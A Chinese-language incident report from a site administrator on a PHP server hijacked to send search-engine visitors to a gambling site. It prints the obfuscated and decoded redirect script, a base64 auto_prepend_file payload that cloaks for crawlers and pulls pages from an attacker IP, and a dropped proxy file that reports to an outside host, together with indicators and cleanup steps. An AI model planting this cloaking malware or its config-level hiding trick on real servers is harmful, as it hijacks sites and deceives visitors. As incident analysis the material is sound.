记录一次服务器被挂马的现象
早上接到运营的消息,说客户反馈网站通过搜索引擎打开时,显示为赌博网站。跟以往的情况不同,这次怎么都找不到被篡改的 PHP 文件,最后发现是配置文件被篡改。
现象
通过搜索引擎打开时,显示为赌博网站,页面被篡改。查看网页源代码,页面代码为:
<!-- Entire response body seen by a visitor arriving from a search engine. The
     auto_prepend_file payload shown later on this page echoes exactly this <head>
     and exit()s before the real site script runs, so the hijack lives in PHP
     configuration rather than in any file of the site. The script host is
     attacker-controlled (the file is apparently named hm.js to resemble Baidu's
     statistics script); treat the domain as an indicator of compromise. -->
<head><script type="text/javascript" src="https://aj88.cc/hm.js"></script></head>
整个页面被改写,加载了一个外部js文件,其内容为:
// Content of the external hm.js. The first statement is wrapped in the well-known
// "p,a,c,k,e,d" eval packer (parameter list p,a,c,k,e,d plus a '|'-joined keyword
// table); the decoded form is listed further down the page. eval() applied to a
// string assembled at runtime is itself a good static-detection signal when
// sweeping served pages or cached copies of a site.
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('n 2=c.2;g(2&&(2.4(\'B\')||2.4(\'k\')||2.4(\'A.y\')||2.4(\'k\')||2.4(\'x\')||2.4(\'w\'))){a 9=[\'u://v.D/\'];a 8=9[h.E(h.C()*9.o)];g(p.r.q(\'t\')!=-1){}f{b.s.m=8}a e="<j d=\'U: V; z-T: R; 6: 3%; 5: 3%; S:0;Z: 10(7, 7, 7);\'><i Y=\'"+8+"\' 5=\'3%\' 6=\'3%\' X=\'0\' W=\'I\'></i></j>";b["c"]["l"](e);b["c"]["l"]("<d J=\'K/F\'>G{5:3%;6:3%}H {5:3%;6:3%;O:P;Q:0}</d>")}f{L.M(\'N\')}',62,63,'||referrer|100|includes|width|height|255|Alibaba|items|var|window|document|style|JackMa|else|if|Math|iframe|div|sogou|write|href|const|length|navigator|indexOf|platform|location|Win32|https|aj68|bing|soso|cn||sm|baidu|random|cc|floor|css|html|body|nofollow|type|text|console|log|不需要跳转|overflow|hidden|margin|9846883647|inset|index|position|fixed|rel|frameborder|src|background|rgb'.split('|'),0,{}))
// What follows looks like the stock Baidu Tongji (hm.baidu.com) statistics embed.
// Because it ships inside the attacker's script, the site id in the query string is
// presumably the attacker's own; it is a useful pivot for correlating other hijacked
// sites in logs or search results.
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?33bae04db2e39e71dad1b03ec0c65ea0";
var s = document.getElementsByTagName("script")[0];
// Inserted ahead of the first <script> element already on the page.
s.parentNode.insertBefore(hm, s);
})();
外部JS
解除混淆后,外部JS内容为:
// Deobfuscated hm.js. Everything hinges on document.referrer, i.e. this is a
// cloaking redirect: only visitors who arrived from a search engine are hijacked,
// while direct visits (including the site owner's own checks) render normally —
// which is why the problem surfaced only through customer reports. To reproduce it
// on your own site, request a page with a Referer header containing one of the
// substrings tested below.
const referrer=document.referrer;
// 'sogou' is tested twice (duplicate in the original); 'sm.cn' is Shenma (UC) search.
if(referrer&&(referrer.includes('baidu')||referrer.includes('sogou')||referrer.includes('sm.cn')||referrer.includes('sogou')||referrer.includes('soso')||referrer.includes('bing'))){
// Only one landing domain today, but the random pick below means the list is built
// to rotate several. The URL is an indicator of compromise.
var items=['https://aj68.cc/'];
var Alibaba=items[Math.floor(Math.random()*items.length)];
// Win32 (desktop Windows) falls through to the overlay below; every other platform
// (mobile, MacIntel, ...) is navigated straight to the landing page. Assigning
// location.href does not stop the script, so the document.write calls still run.
if(navigator.platform.indexOf('Win32')!=-1){
}else{
window.location.href=Alibaba
}
// Fixed, full-viewport <div> with a very large z-index holding an <iframe> of the
// landing page: the gambling site is displayed while the address bar still shows the
// victim site's URL. (rel is not an <iframe> attribute and has no effect.)
var JackMa="<div style='position: fixed; z-index: 9846883647; height: 100%; width: 100%; inset:0;background: rgb(255, 255, 255);'><iframe src='"+Alibaba+"' width='100%' height='100%' frameborder='0' rel='nofollow'></iframe></div>";
// Bracket notation for document.write is likely meant to dodge naive string
// matching on "document.write"; it behaves identically.
window["document"]["write"](JackMa);
// Stretch html/body to the viewport and hide scrollbars so none of the real page shows.
window["document"]["write"]("<style type='text/css'>html{width:100%;height:100%}body {width:100%;height:100%;overflow:hidden;margin:0}</style>")
}else{
// Logged for every non-search-engine visitor: "no redirect needed".
console.log('不需要跳转')
}
// Baidu Tongji (hm.baidu.com) statistics embed carried inside the attacker's script;
// the site id is presumably the attacker's and can be used to pivot across
// other affected sites.
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?33bae04db2e39e71dad1b03ec0c65ea0";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
可以看出,当来源地址包含 baidu、sogou、sm.cn、sogou、soso 和 bing 时,利用 iframe 框架加载 https://aj68.cc/ 网站。
后端文件
按照常规,全局搜索 php 文件,关键字为 baidu,却没有发现异常文件。
难道是混淆了代码?尝试断点代码,发现断到入口文件,甚至清空 PHP 文件都没用。
这就有意思了,应该是 WEB 软件或 PHP 出问题了。先来个 phpinfo(),排查下配置文件。
果然,发现 auto_prepend_file 配置项有内容,并且是 base64 编码的。
其内容为:
data:;base64,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
解码后内容为:
<?php
// Payload injected through auto_prepend_file as a data:;base64 URI. It therefore runs
// in front of every PHP request on the server without any file on disk to find —
// which is why the sweep of the site's PHP files, and even emptying them, changed
// nothing. Two cloaking branches: search-engine crawlers (matched on User-Agent) are
// served pages fetched from 27.124.21.126; humans arriving from a search engine
// (matched on Referer) get the aj88.cc redirect script. Everyone else sees the
// normal site. Indicators: 27.124.21.126, aj88.cc, and an auto_prepend_file value
// starting with "data:;base64," in any php.ini (php --ini lists the files loaded).
header("Content-type: text/html; charset=utf-8"); // forced on every response, HTML or not
set_time_limit(30);
error_reporting(0); // hides notices such as the possibly missing HTTP_REFERER index below
// Sets the User-Agent that file_get_contents() sends upstream: the server fetches the
// spam pages while presenting itself as Baiduspider.
ini_set('user_agent','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$referrer = $_SERVER['HTTP_REFERER'];
$host = $_SERVER['HTTP_HOST'];
$uri = $_SERVER['REQUEST_URI'];
// Host and URI reduced to [a-zA-Z0-9] and used as a path on the attacker's server:
// one pre-generated page per hijacked URL.
$rhost = preg_replace("/[^a-zA-Z0-9]/", "", $host);
$ruri = preg_replace("/[^a-zA-Z0-9]/", "", $uri);
$url = "http://27.124.21.126"."/".$rhost."/".$ruri.".html";
// Substrings matched (case-sensitively) against both User-Agent and Referer;
// "sm" is short enough to be prone to accidental matches.
$exp = array('google.com','yahoo.com','bing.com','baidu.com','sogou','soso',"sm");
// Crawler branch: echo the remote page before the real script runs. There is no
// exit() here, so the genuine page follows the injected content in the same response
// — presumably to get the site indexed for gambling keywords while it keeps
// "working". This outbound fetch needs allow_url_fopen and server egress; it is the
// only branch that a security-group egress block actually stops.
foreach ($exp as $engine) {
if (strpos($user_agent, $engine) !== false) {
$file_contents = file_get_contents($url);
echo $file_contents;
break;
}
};
// Unused variable (never read).
$is_search_engine_referral = false;
// Referer branch: replace the whole page with a <head> that loads the redirect
// script and stop. No server egress is involved — only the visitor's browser contacts
// aj88.cc — so this branch keeps working until the ini entry itself is removed.
foreach ($exp as $engine) {
if (strpos($referrer, $engine) !== false) {
echo '<head>';
echo '<script type="text/javascript" src="https://aj88.cc/hm.js"></script>';
echo '</head>';
exit();
}
};
?>
解决办法
全局搜索 ini 配置文件(服务器内有多个 PHP 版本),关键字为 base64,删除对应的异常配置内容即可。
其它
另外,站点内发现了个异常 PHP 文件,日期跟配置文件篡改的日期是同一天。在此记录一下内容:
<?php
// Second artifact found on the site, dated the same day as the ini tampering. It is a
// thin proxy: every request is forwarded to at.zdxhn.com together with this page's
// URL, the raw query string and the server name, and whatever comes back is echoed
// verbatim, so the content of this page is decided entirely by the remote server at
// request time. Indicator: at.zdxhn.com. Preserve a copy with its timestamps for the
// intrusion timeline before deleting it.
set_time_limit(0); // no execution limit: the request waits as long as the upstream takes
header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$TD_server = "http://at.zdxhn.com/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
// Values are concatenated into the URL without urlencode(); the upstream thus also
// learns the exact host and path this file was dropped at.
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
echo $Content_mb;
?>
问题算是解决了,但是治标不治本,服务器环境比较老旧,不好排查,不知道怎么被入侵的。
为了缓解问题,直接在安全组关闭了所有出站流量,勉强缓解一下。